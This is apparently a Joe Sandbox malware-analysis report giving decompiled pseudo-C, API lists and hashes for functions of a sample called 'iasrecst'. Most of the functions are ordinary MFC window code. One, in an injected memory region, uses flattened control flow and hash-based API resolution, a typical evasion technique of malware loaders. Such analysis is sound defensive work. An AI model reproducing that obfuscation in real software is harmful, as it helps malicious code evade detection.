Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: State$DesktopFocusMessageSendWindow
String ID:
API String ID: 2814764316-0
Opcode ID: c3de53c5a3b934d276908d7c7df658ce1646e09da35e5cf36f041f9f8bba838b
Instruction ID: b57d560b4246ca497f525dd7341a5897b5c585060d52b80c51f82830bbc2b57b
Opcode Fuzzy Hash: c3de53c5a3b934d276908d7c7df658ce1646e09da35e5cf36f041f9f8bba838b
Instruction Fuzzy Hash: 4C012032B003257FEB102B94ED45FA97798EB147A4F904437FE42D7191EAF8AC4396A4

Uniqueness

Uniqueness Score: -1.00%

Function 0041580E, Relevance: 6.0, APIs: 4, Instructions: 38
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041580E(void* __ecx) {
				void* _t11;
				void* _t12;
				void* _t16;

				_t12 = __ecx;
				if((E00416528(__ecx) & 0x40000000) != 0) {
					L6:
					return E004136A7(_t12);
				}
				_t16 = E00404DAE();
				if(_t16 == 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t16 + 0x1c), 0x111, 0xe146, 0);
					_t11 = 1;
					return _t11;
				}
			}

0x00415811
0x0041581d
0x00415865
0x00000000
0x00415867
0x00415824
0x00415828
0x00000000
0x0041584b
0x0041585a
0x00415862
0x00000000
0x00415862

APIs

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

GetKeyState.USER32(00000010), ref: 00415832
GetKeyState.USER32(00000011), ref: 0041583B
GetKeyState.USER32(00000012), ref: 00415844
SendMessageA.USER32 ref: 0041585A

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: 12084169472d455916fea6db0bf09667f92a5ea2c7c3b09716cbb5453971e85a
Instruction ID: 667728aae4084d5946ddf495d1d29dbc27f199ee829e175ed2889692379dfdac
Opcode Fuzzy Hash: 12084169472d455916fea6db0bf09667f92a5ea2c7c3b09716cbb5453971e85a
Instruction Fuzzy Hash: 47F0E232740746E5E63036931C42FD913144FC0BD4F45083AB701AE1D18A9988E30278

Uniqueness

Uniqueness Score: -1.00%

Function 022C1FB0, Relevance: 4.0, Strings: 3, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E022C1FB0(intOrPtr* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __ebp;
				void* _t26;
				intOrPtr* _t28;
				signed int _t29;
				intOrPtr _t34;
				signed int _t35;
				intOrPtr* _t40;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr* _t47;
				intOrPtr* _t49;
				intOrPtr* _t50;
				intOrPtr* _t54;
				intOrPtr* _t57;
				intOrPtr* _t58;
				intOrPtr _t60;
				intOrPtr _t66;
				intOrPtr* _t85;
				intOrPtr _t88;
				void* _t89;
				intOrPtr _t91;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr* _t95;
				void* _t96;
				void* _t98;
				void* _t99;

				_t58 = __ecx;
				_t88 =  *((intOrPtr*)(_t96 + 0x1c));
				_t95 = __edx;
				 *((intOrPtr*)(_t96 + 0x10)) = __ecx;
				_t57 = 0;
				_t26 = 0x1e37d88e;
				while(1) {
					L1:
					_t91 =  *((intOrPtr*)(_t96 + 0x18));
					goto L2;
					do {
						while(1) {
							L2:
							_t98 = _t26 - 0x27643e76;
							if(_t98 > 0) {
								break;
							}
							if(_t98 == 0) {
								_t26 = 0x1f9931a7;
								continue;
							} else {
								_t99 = _t26 - 0x1f9931a7;
								if(_t99 > 0) {
									__eflags = _t26 - 0x234da148;
									if(_t26 == 0x234da148) {
										__eflags = _t57;
										if(_t57 == 0) {
											E022C4250(_t57,  *_t95);
										}
										goto L44;
									} else {
										__eflags = _t26 - 0x23930c9c;
										if(_t26 != 0x23930c9c) {
											goto L40;
										} else {
											_t44 =  *0x22ce120; // 0x0
											__eflags = _t44;
											if(_t44 == 0) {
												_t44 = E022C3E80(_t57, E022C3F20(0x667fdee), 0x207605dd, _t95);
												 *0x22ce120 = _t44;
											}
											_t60 =  *0x22ce2e4; // 0x7792e8
											_t45 =  *_t44( *((intOrPtr*)(_t96 + 0x28)), _t91, 0x60,  *((intOrPtr*)(_t60 + 0x1c)), 0, 0);
											_t58 =  *((intOrPtr*)(_t96 + 0x10));
											__eflags = _t45;
											_t26 = 0x3134f996;
											_t57 =  !=  ? 1 : _t57;
											continue;
										}
									}
								} else {
									if(_t99 == 0) {
										_t47 =  *0x22cdea8;
										_t93 =  *((intOrPtr*)(_t58 + 4)) + 0xffffff8c;
										 *((intOrPtr*)(_t95 + 4)) = _t93;
										__eflags = _t47;
										if(_t47 == 0) {
											_t47 = E022C3E80(_t57, E022C3F20(0xbb398380), 0x97f883e, _t95);
											 *0x22cdea8 = _t47;
										}
										_t89 =  *_t47();
										_t49 =  *0x22cdcec;
										__eflags = _t49;
										if(_t49 == 0) {
											_t49 = E022C3E80(_t57, E022C3F20(0xbb398380), 0xe9233692, _t95);
											 *0x22cdcec = _t49;
										}
										_t50 =  *_t49(_t89, 8, _t93);
										 *_t95 = _t50;
										__eflags = _t50;
										if(_t50 == 0) {
											L44:
											return _t57;
										} else {
											_t58 =  *((intOrPtr*)(_t96 + 0x10));
											_t91 =  *_t58;
											 *((intOrPtr*)(_t96 + 0x18)) = _t91;
											_t88 =  *((intOrPtr*)(_t58 + 4)) - 0x74;
											 *((intOrPtr*)(_t96 + 0x1c)) = _t91 + 0x74;
											_t26 = 0x3ac56b1d;
											continue;
										}
									} else {
										if(_t26 == 0x72b6082) {
											_t54 =  *0x22cdaac;
											_t94 =  *_t95;
											__eflags = _t54;
											if(_t54 == 0) {
												_t54 = E022C3E80(_t57, E022C3F20(0xe66945e6), 0x70f7b8ec, _t95);
												 *0x22cdaac = _t54;
											}
											 *_t54(_t94,  *((intOrPtr*)(_t96 + 0x20)), _t88);
											_t58 =  *((intOrPtr*)(_t96 + 0x1c));
											_t96 = _t96 + 0xc;
											_t26 = 0x3126cae3;
											goto L1;
										} else {
											if(_t26 != 0x1e37d88e) {
												goto L40;
											} else {
												_t26 = 0x323ed498;
												continue;
											}
										}
									}
								}
							}
							L45:
						}
						__eflags = _t26 - 0x323ed498;
						if(__eflags > 0) {
							__eflags = _t26 - 0x3ac56b1d;
							if(_t26 != 0x3ac56b1d) {
								goto L40;
							} else {
								_t28 =  *0x22cdef8;
								__eflags = _t28;
								if(_t28 == 0) {
									_t28 = E022C3E80(_t57, E022C3F20(0x667fdee), 0xb11f83b0, _t95);
									 *0x22cdef8 = _t28;
								}
								_t66 =  *0x22ce2e4; // 0x7792e8
								_t29 =  *_t28( *((intOrPtr*)(_t66 + 0x18)), 0, 0, _t96 + 0x14);
								_t58 =  *((intOrPtr*)(_t96 + 0x10));
								asm("sbb eax, eax");
								_t26 = ( ~_t29 & 0xe3ddbf3a) + 0x234da148;
								goto L2;
							}
						} else {
							if(__eflags == 0) {
								__eflags =  *((intOrPtr*)(_t58 + 4)) - 0x74;
								if( *((intOrPtr*)(_t58 + 4)) < 0x74) {
									goto L44;
								} else {
									_t26 = 0x27643e76;
									goto L2;
								}
							} else {
								__eflags = _t26 - 0x3126cae3;
								if(_t26 == 0x3126cae3) {
									_t85 =  *0x22cdf8c; // 0x0
									__eflags = _t85;
									if(_t85 == 0) {
										_t85 = E022C3E80(_t57, E022C3F20(0x667fdee), 0x47a72724, _t95);
										 *0x22cdf8c = _t85;
									}
									_t34 =  *0x22ce2e4; // 0x7792e8
									_t35 =  *_t85( *((intOrPtr*)(_t34 + 0x20)),  *((intOrPtr*)(_t96 + 0x24)), 1, 0,  *_t95, _t95 + 4);
									_t58 =  *((intOrPtr*)(_t96 + 0x10));
									asm("sbb eax, eax");
									_t26 = ( ~_t35 & 0xf25e1306) + 0x3134f996;
									goto L2;
								} else {
									__eflags = _t26 - 0x3134f996;
									if(_t26 != 0x3134f996) {
										goto L40;
									} else {
										_t40 =  *0x22ce168;
										__eflags = _t40;
										if(_t40 == 0) {
											_t40 = E022C3E80(_t57, E022C3F20(0x667fdee), 0xae646c41, _t95);
											 *0x22ce168 = _t40;
										}
										 *_t40( *((intOrPtr*)(_t96 + 0x14)));
										_t58 =  *((intOrPtr*)(_t96 + 0x10));
										_t26 = 0x234da148;
										goto L2;
									}
								}
							}
						}
						goto L45;
						L40:
						__eflags = _t26 - 0x6df8497;
					} while (_t26 != 0x6df8497);
					return _t57;
					goto L45;
				}
			}

0x022c1fb0
0x022c1fb7
0x022c1fbb
0x022c1fbd
0x022c1fc1
0x022c1fc3
0x022c1fc8
0x022c1fc8
0x022c1fc8
0x022c1fc8
0x022c1fd0
0x022c1fd0
0x022c1fd0
0x022c1fd0
0x022c1fd5
0x00000000
0x00000000
0x022c1fdb
0x022c2133
0x00000000
0x022c1fe1
0x022c1fe1
0x022c1fe6
0x022c20cb
0x022c20d0
0x022c226f
0x022c2271
0x022c2276
0x022c2276
0x00000000
0x022c20d6
0x022c20d6
0x022c20db
0x00000000
0x022c20e1
0x022c20e1
0x022c20e6
0x022c20e8
0x022c20fb
0x022c2100
0x022c2100
0x022c2105
0x022c2119
0x022c211b
0x022c211f
0x022c2126
0x022c212b
0x00000000
0x022c212b
0x022c20db
0x022c1fec
0x022c1fec
0x022c2047
0x022c204c
0x022c204f
0x022c2052
0x022c2054
0x022c2067
0x022c206c
0x022c206c
0x022c2073
0x022c2075
0x022c207a
0x022c207c
0x022c208f
0x022c2094
0x022c2094
0x022c209d
0x022c209f
0x022c20a2
0x022c20a4
0x022c227e
0x022c2284
0x022c20aa
0x022c20aa
0x022c20ae
0x022c20b3
0x022c20b7
0x022c20bd
0x022c20c1
0x00000000
0x022c20c1
0x022c1fee
0x022c1ff3
0x022c2007
0x022c200c
0x022c200f
0x022c2011
0x022c2024
0x022c2029
0x022c2029
0x022c2034
0x022c2036
0x022c203a
0x022c203d
0x00000000
0x022c1ff5
0x022c1ffa
0x00000000
0x022c2000
0x022c2000
0x00000000
0x022c2000
0x022c1ffa
0x022c1ff3
0x022c1fec
0x022c1fe6
0x00000000
0x022c1fdb
0x022c213d
0x022c2142
0x022c2204
0x022c2209
0x00000000
0x022c220b
0x022c220b
0x022c2210
0x022c2212
0x022c2225
0x022c222a
0x022c222a
0x022c2234
0x022c2241
0x022c2243
0x022c2249
0x022c2250
0x00000000
0x022c2250
0x022c2148
0x022c2148
0x022c21f0
0x022c21f4
0x00000000
0x022c21fa
0x022c21fa
0x00000000
0x022c21fa
0x022c214e
0x022c214e
0x022c2153
0x022c2198
0x022c219e
0x022c21a0
0x022c21b8
0x022c21ba
0x022c21ba
0x022c21c0
0x022c21d7
0x022c21d9
0x022c21df
0x022c21e6
0x00000000
0x022c2155
0x022c2155
0x022c215a
0x00000000
0x022c2160
0x022c2160
0x022c2165
0x022c2167
0x022c217a
0x022c217f
0x022c217f
0x022c2188
0x022c218a
0x022c218e
0x00000000
0x022c218e
0x022c215a
0x022c2153
0x022c2148
0x00000000
0x022c225a
0x022c225a
0x022c225a
0x022c226e
0x00000000
0x022c226e

Strings

v>d', xrefs: 022C21FA
v>d', xrefs: 022C1FD0
Ei, xrefs: 022C2013

Memory Dump Source

Source File: 00000001.00000002.496688716.00000000022C1000.00000020.00000001.sdmp, Offset: 022C0000, based on PE: true

Associated: 00000001.00000002.496676614.00000000022C0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496717188.00000000022CD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496745488.00000000022D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_22c0000_iasrecst.jbxd

Yara matches

Similarity

API ID:
String ID: v>d'$v>d'$Ei
API String ID: 0-262821485
Opcode ID: b671b275ca7ddba5ad3f239196d56f7442e8d09e104588f571ad62eb0f468e7f
Instruction ID: 8844375d833baa5cb959b6329134e9e53766397c5b0486e172ca6ff0df35201f
Opcode Fuzzy Hash: b671b275ca7ddba5ad3f239196d56f7442e8d09e104588f571ad62eb0f468e7f
Instruction Fuzzy Hash: D161D575B64302DBCB14EEE9985076A77A6BB84244F348B6EE805CB35CDF71D811CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00423382, Relevance: 42.5, APIs: 28, Instructions: 479
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00423382(intOrPtr __ecx) {
				int _t231;
				void* _t239;
				int _t240;
				void* _t260;
				void* _t267;
				void* _t268;
				CHAR* _t280;
				signed int _t336;
				int _t392;
				CHAR* _t407;
				signed int _t408;
				signed int _t409;
				int _t420;
				struct tagSIZE* _t421;
				int _t428;
				signed int _t437;
				int _t442;
				signed int _t446;
				void* _t447;
				int _t453;
				void* _t456;
				intOrPtr _t461;

				E00406520(E0042A9E0, _t456);
				_t461 =  *0x439c44; // 0x1
				 *((intOrPtr*)(_t456 - 0x50)) = __ecx;
				if(_t461 == 0) {
					_push(__ecx);
					E0041A41D(_t456 - 0x44, __eflags);
					 *(_t456 - 4) = 0;
					 *(_t456 - 0x30) = E00416528(__ecx);
					GetWindowRect( *(__ecx + 0x1c), _t456 - 0x28);
					OffsetRect(_t456 - 0x28,  ~( *(_t456 - 0x28)),  ~( *(_t456 - 0x24)));
					 *((intOrPtr*)(_t456 - 0x48)) = 0;
					 *((intOrPtr*)(_t456 - 0x4c)) = 0x42d72c;
					 *(_t456 - 4) = 1;
					E0041A611(_t456 - 0x4c, CreateSolidBrush(GetSysColor(6)));
					 *(_t456 - 0x5c) =  *(_t456 - 0x5c) & 0x00000000;
					 *((intOrPtr*)(_t456 - 0x60)) = 0x42d72c;
					 *(_t456 - 4) = 2;
					asm("sbb eax, eax");
					E0041A611(_t456 - 0x60, CreateSolidBrush(GetSysColor( ~( *( *((intOrPtr*)(_t456 - 0x50)) + 0xc4)) + 0xb)));
					 *(_t456 - 0x54) =  *(_t456 - 0x54) & 0x00000000;
					 *(_t456 - 0x58) = 0x42d72c;
					 *(_t456 - 4) = 3;
					asm("sbb eax, eax");
					E0041A611(_t456 - 0x58, CreateSolidBrush(GetSysColor( ~( *( *((intOrPtr*)(_t456 - 0x50)) + 0xc4)) + 3)));
					 *(_t456 - 0x10) = GetSystemMetrics(6);
					 *(_t456 - 0x14) = GetSystemMetrics(5);
					_t428 = GetSystemMetrics(0x21);
					_t231 = GetSystemMetrics(0x20);
					__eflags =  *(_t456 - 0x30) & 0x00040600;
					_t442 = _t231;
					if(( *(_t456 - 0x30) & 0x00040600) != 0) {
						E004232C5(_t456 - 0x44, _t456 - 0x28,  *(_t456 - 0x14),  *(_t456 - 0x10), _t456 - 0x4c);
						InflateRect(_t456 - 0x28,  ~( *(_t456 - 0x14)),  ~( *(_t456 - 0x10)));
						E004232C5(_t456 - 0x44, _t456 - 0x28, _t442 -  *(_t456 - 0x14), _t428 -  *(_t456 - 0x10), _t456 - 0x60);
						_t407 =  &(( *(_t456 - 0x10))[ *(_t456 - 0x10)]);
						 *(_t456 - 0x74) = _t407;
						_t408 =  *(_t456 - 0x14);
						 *(_t456 - 0x18) = _t428 - _t407;
						_t336 = _t442 - _t408 + _t408;
						__eflags =  *(_t456 - 0x2f) & 0x00000002;
						 *(_t456 - 0x2c) = _t336;
						if(( *(_t456 - 0x2f) & 0x00000002) != 0) {
							_t409 =  *(_t456 - 0x18);
						} else {
							_t436 = _t428 -  *(_t456 - 0x74) +  *0x439c9c;
							_t455 = _t442 - _t408 + _t408 * 2 +  *0x439c98;
							E00423F5E(_t456 - 0x44,  *(_t456 - 0x28),  *(_t456 - 0x24) + _t428 -  *(_t456 - 0x74) +  *0x439c9c, _t336, 1, 0);
							E00423F5E(_t456 - 0x44,  *(_t456 - 0x28),  *((intOrPtr*)(_t456 - 0x1c)) - _t428 -  *(_t456 - 0x74) +  *0x439c9c,  *(_t456 - 0x2c), 1, 0);
							E00423F5E(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) -  *(_t456 - 0x2c),  *(_t456 - 0x24) + _t428 -  *(_t456 - 0x74) +  *0x439c9c,  *(_t456 - 0x2c), 1, 0);
							E00423F5E(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) -  *(_t456 - 0x2c),  *((intOrPtr*)(_t456 - 0x1c)) - _t436,  *(_t456 - 0x2c), 1, 0);
							_t437 =  *(_t456 - 0x18);
							E00423F5E(_t456 - 0x44,  *(_t456 - 0x28) + _t442 - _t408 + _t408 * 2 +  *0x439c98,  *(_t456 - 0x24), 1, _t437, 0);
							E00423F5E(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) - _t442 - _t408 + _t408 * 2 +  *0x439c98,  *(_t456 - 0x24), 1, _t437, 0);
							E00423F5E(_t456 - 0x44,  *(_t456 - 0x28) + _t442 - _t408 + _t408 * 2 +  *0x439c98,  *((intOrPtr*)(_t456 - 0x1c)) - _t437, 1, _t437, 0);
							E00423F5E(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) - _t455,  *((intOrPtr*)(_t456 - 0x1c)) - _t437, 1, _t437, 0);
							_t336 =  *(_t456 - 0x2c);
							_t409 = _t437;
						}
						InflateRect(_t456 - 0x28,  ~_t336,  ~_t409);
					}
					__eflags =  *(_t456 - 0x2e) & 0x000000c0;
					if(( *(_t456 - 0x2e) & 0x000000c0) == 0) {
						E004232C5(_t456 - 0x44, _t456 - 0x28,  *(_t456 - 0x14),  *(_t456 - 0x10), _t456 - 0x4c);
						goto L25;
					} else {
						asm("movsd");
						asm("movsd");
						_t240 =  *0x439c9c; // 0x0
						asm("movsd");
						asm("movsd");
						_t446 =  *(_t456 - 0x10);
						 *(_t456 - 0x64) = _t240 + _t446 +  *(_t456 - 0x24);
						E004232C5(_t456 - 0x44, _t456 - 0x70,  *(_t456 - 0x14), _t446, _t456 - 0x4c);
						InflateRect(_t456 - 0x70,  ~( *(_t456 - 0x14)),  ~_t446);
						asm("sbb eax, eax");
						FillRect( *(_t456 - 0x40), _t456 - 0x70,  ~(_t456 - 0x58) &  *(_t456 - 0x54));
						E004232C5(_t456 - 0x44, _t456 - 0x28,  *(_t456 - 0x14), _t446, _t456 - 0x4c);
						_t260 =  *0x439ca0; // 0x0
						__eflags = _t260;
						if(_t260 != 0) {
							 *(_t456 - 0x18) = SelectObject( *(_t456 - 0x40), _t260);
							_t280 =  *0x436980; // 0x436994
							 *(_t456 - 0x10) = _t280;
							 *(_t456 - 4) = 4;
							E004140EE( *((intOrPtr*)(_t456 - 0x50)), _t456 - 0x10);
							_t421 = _t456 - 0x78;
							asm("sbb esi, esi");
							_t453 = ( ~( *(_t456 - 0x30) & 0x00080000) &  *0x439c98) +  *(_t456 - 0x70);
							GetTextExtentPoint32A( *(_t456 - 0x3c),  *(_t456 - 0x10),  *( *(_t456 - 0x10) - 8), _t421);
							__eflags =  *(_t456 - 0x78) -  *((intOrPtr*)(_t456 - 0x68)) -  *(_t456 - 0x70);
							if( *(_t456 - 0x78) <=  *((intOrPtr*)(_t456 - 0x68)) -  *(_t456 - 0x70)) {
								E0041A240(_t456 - 0x44, 6);
								asm("cdq");
								_t453 = _t453 + ( *((intOrPtr*)(_t456 - 0x68)) - _t453 - _t421 >> 1);
								__eflags = _t453;
							}
							GetTextMetricsA( *(_t456 - 0x3c), _t456 - 0xb8);
							InflateRect(_t456 - 0x70, 0, 1);
							asm("cdq");
							asm("sbb eax, eax");
							E00419E62(GetSysColor(( ~( *( *((intOrPtr*)(_t456 - 0x50)) + 0xc4)) & 0x000000f6) + 0x13), _t456 - 0x44, _t302);
							E00419DAA(_t456 - 0x44, 1);
							ExtTextOutA( *(_t456 - 0x40), _t453,  *((intOrPtr*)(_t456 - 0x6c)) + ( *(_t456 - 0x64) -  *((intOrPtr*)(_t456 - 0xac)) +  *((intOrPtr*)(_t456 - 0xb0)) +  *((intOrPtr*)(_t456 - 0xb4)) -  *((intOrPtr*)(_t456 - 0x6c)) + 1 - _t421 >> 1), 4, _t456 - 0x70,  *(_t456 - 0x10),  *( *(_t456 - 0x10) - 8), 0);
							__eflags =  *(_t456 - 0x18);
							if( *(_t456 - 0x18) != 0) {
								SelectObject( *(_t456 - 0x40),  *(_t456 - 0x18));
							}
							 *(_t456 - 4) = 3;
							E00416AEC(_t456 - 0x10);
						}
						__eflags =  *(_t456 - 0x2e) & 0x00000008;
						if(( *(_t456 - 0x2e) & 0x00000008) == 0) {
							L23:
							 *(_t456 - 0x24) =  *(_t456 - 0x64);
							L25:
							 *(_t456 - 0x58) = 0x42cb14;
							 *(_t456 - 4) = 9;
							E0041A668(_t456 - 0x58);
							 *((intOrPtr*)(_t456 - 0x60)) = 0x42cb14;
							 *(_t456 - 4) = 0xa;
							E0041A668(_t456 - 0x60);
							 *((intOrPtr*)(_t456 - 0x4c)) = 0x42cb14;
							 *(_t456 - 4) = 0xb;
						} else {
							E00419B00(_t456 - 0x80);
							 *(_t456 - 4) = 5;
							asm("sbb eax, eax");
							_t267 = E00419BB7(_t456 - 0x80, CreateCompatibleDC( ~(_t456 - 0x44) &  *(_t456 - 0x40)));
							__eflags = _t267;
							if(_t267 != 0) {
								_t268 =  *0x439ca4; // 0x0
								__eflags = _t268;
								if(_t268 == 0) {
									_t447 = 0;
									__eflags = 0;
								} else {
									_t447 = SelectObject( *(_t456 - 0x7c), _t268);
								}
								_t392 =  *0x439c9c; // 0x0
								_t420 =  *0x439c98; // 0x0
								asm("sbb eax, eax");
								BitBlt( *(_t456 - 0x40),  *(_t456 - 0x28),  *(_t456 - 0x24), _t420, _t392,  ~(_t456 - 0x80) &  *(_t456 - 0x7c), 0, 0, 0xcc0020);
								__eflags = _t447;
								if(_t447 != 0) {
									SelectObject( *(_t456 - 0x7c), _t447);
								}
								 *(_t456 - 4) = 3;
								E00419C1F(_t456 - 0x80);
								goto L23;
							} else {
								 *(_t456 - 4) = 3;
								E00419C1F(_t456 - 0x80);
								 *(_t456 - 0x58) = 0x42cb14;
								 *(_t456 - 4) = 6;
								E0041A668(_t456 - 0x58);
								 *((intOrPtr*)(_t456 - 0x60)) = 0x42cb14;
								 *(_t456 - 4) = 7;
								E0041A668(_t456 - 0x60);
								 *((intOrPtr*)(_t456 - 0x4c)) = 0x42cb14;
								 *(_t456 - 4) = 8;
							}
						}
					}
					E0041A668(_t456 - 0x4c);
					_t197 = _t456 - 4;
					 *_t197 =  *(_t456 - 4) | 0xffffffff;
					__eflags =  *_t197;
					_t239 = E0041A48F(_t456 - 0x44);
				} else {
					_t239 = E004136A7(__ecx);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t456 - 0xc));
				return _t239;
			}

APIs

__EH_prolog.LIBCMT ref: 00423387
GetWindowRect.USER32 ref: 004233CB
OffsetRect.USER32(?,?,?), ref: 004233E1
GetSysColor.USER32(00000006), ref: 004233FE
CreateSolidBrush.GDI32(00000000), ref: 00423407
GetSysColor.USER32(?), ref: 0042342E
CreateSolidBrush.GDI32(00000000), ref: 00423431
GetSysColor.USER32(?), ref: 00423458
CreateSolidBrush.GDI32(00000000), ref: 0042345B
GetSystemMetrics.USER32 ref: 0042346E
GetSystemMetrics.USER32 ref: 00423475
GetSystemMetrics.USER32 ref: 0042347C
GetSystemMetrics.USER32 ref: 00423482
InflateRect.USER32(?,?,?), ref: 004234BA

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: MetricsSystem$BrushColorCreateRectSolid$H_prologInflateOffsetWindow
String ID:
API String ID: 1266645593-0
Opcode ID: 827b8b6824deef71f215e530bef12f339db5eb1673a232190c9b8040d827e70b
Instruction ID: 63fa9e6fd2119b7c539c7c0ae66551d555764ff581325622ef96e7efc3e9d792
Opcode Fuzzy Hash: 827b8b6824deef71f215e530bef12f339db5eb1673a232190c9b8040d827e70b
Instruction Fuzzy Hash: 1A022871E00219ABCF11DFE4DD89EEEBBB9EF08704F14411AE505B7290DB78AA45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004139FC, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 170
stringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004139FC(void* __edx, void* _a4, int _a8, long _a12) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				void* __ebp;
				intOrPtr _t50;
				signed int _t52;
				long _t53;
				long _t62;
				long _t70;
				char _t71;
				long _t73;
				CHAR* _t76;
				int _t83;
				signed char _t92;
				void* _t93;
				void* _t95;
				long _t96;
				intOrPtr _t99;
				intOrPtr* _t101;
				intOrPtr _t102;
				CHAR* _t104;
				long _t105;

				_t93 = __edx;
				_t50 = E00425C92(0x4397cc, E0042440D);
				_v8 = _t50;
				if(_a4 != 3) {
					return CallNextHookEx( *(_t50 + 0x2c), _a4, _a8, _a12);
				}
				_t101 =  *((intOrPtr*)(_t50 + 0x14));
				_t95 =  *_a12;
				_t52 =  *(E00424BFB() + 0x14) & 0x000000ff;
				_t83 = _a8;
				_v12 = _t52;
				if(_t101 != 0 || ( *(_t95 + 0x23) & 0x00000040) == 0 && _t52 == 0) {
					if( *0x439c54 == 0) {
						L10:
						if(_t101 == 0) {
							_t53 = GetWindowLongA(_t83, 0xfffffffc);
							_a4 = _t53;
							if(_t53 != 0) {
								_t104 = "AfxOldWndProc423";
								if(GetPropA(_t83, _t104) == 0) {
									SetPropA(_t83, _t104, _a4);
									if(GetPropA(_t83, _t104) == _a4) {
										GlobalAddAtomA(_t104);
										_t62 = E00413980;
										if( *((intOrPtr*)(_v8 + 0x28)) == 0) {
											_t62 = E00413821;
										}
										SetWindowLongA(_t83, 0xfffffffc, _t62);
									}
								}
							}
							goto L27;
						}
						E00413785(_t101, _t83);
						 *((intOrPtr*)( *_t101 + 0x50))();
						_a8 =  *((intOrPtr*)( *_t101 + 0x80))();
						if( *0x439c3c != 0 || _v12 != 0) {
							L18:
							_t105 = E0041381B();
							_t70 = SetWindowLongA(_t83, 0xfffffffc, _t105);
							if(_t70 == _t105) {
								goto L20;
							}
							goto L19;
						} else {
							_t99 =  *0x439c50; // 0x7631b8
							if(_t99 == 0 ||  *((intOrPtr*)(_t99 + 0x20)) == 0) {
								goto L18;
							} else {
								_push(0);
								_push(0);
								_push(0x36f);
								_push(_t83);
								_push(_t101);
								_t71 = E0041357F(_t93);
								_v20 = _t71;
								if(_t71 == 0) {
									goto L18;
								}
								_a4 = E0041381B();
								_t73 = GetWindowLongA(_t83, 0xfffffffc);
								asm("sbb esi, esi");
								 *((intOrPtr*)(_t99 + 0x20))(_t83, _v20);
								if( ~(_t73 - _a4) + 1 != 0) {
									L20:
									_t102 = _v8;
									 *(_t102 + 0x14) =  *(_t102 + 0x14) & 0x00000000;
									goto L28;
								}
								_t70 = SetWindowLongA(_t83, 0xfffffffc, _a4);
								L19:
								 *_a8 = _t70;
								goto L20;
							}
						}
					}
					if((GetClassLongA(_t83, 0xffffffe6) & 0x00010000) != 0) {
						goto L27;
					}
					_t76 =  *(_t95 + 0x28);
					_t92 = _t76 >> 0x10;
					if(_t92 == 0) {
						_v20 = _v20 & _t92;
						GlobalGetAtomNameA( *(_t95 + 0x28),  &_v20, 5);
						_t76 =  &_v20;
					}
					if(lstrcmpiA(_t76, ?str?) == 0) {
						goto L27;
					} else {
						goto L10;
					}
				} else {
					L27:
					_t102 = _v8;
					L28:
					_t96 = CallNextHookEx( *(_t102 + 0x2c), 3, _t83, _a12);
					if(_v12 != 0) {
						UnhookWindowsHookEx( *(_t102 + 0x2c));
						 *(_t102 + 0x2c) =  *(_t102 + 0x2c) & 0x00000000;
					}
					return _t96;
				}
			}

APIs

Part of subcall function 00425C92: TlsGetValue.KERNEL32(004399AC,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000,?,0040ECAE,00000000,00000000,00000000,00000000), ref: 00425CD1

CallNextHookEx.USER32 ref: 00413A26
GetClassLongA.USER32 ref: 00413A6D
GlobalGetAtomNameA.KERNEL32(?,?,00000005), ref: 00413A99
lstrcmpiA.KERNEL32(?,ime,?,?,?,Function_0002440D), ref: 00413AA8
GetWindowLongA.USER32 ref: 00413B1B
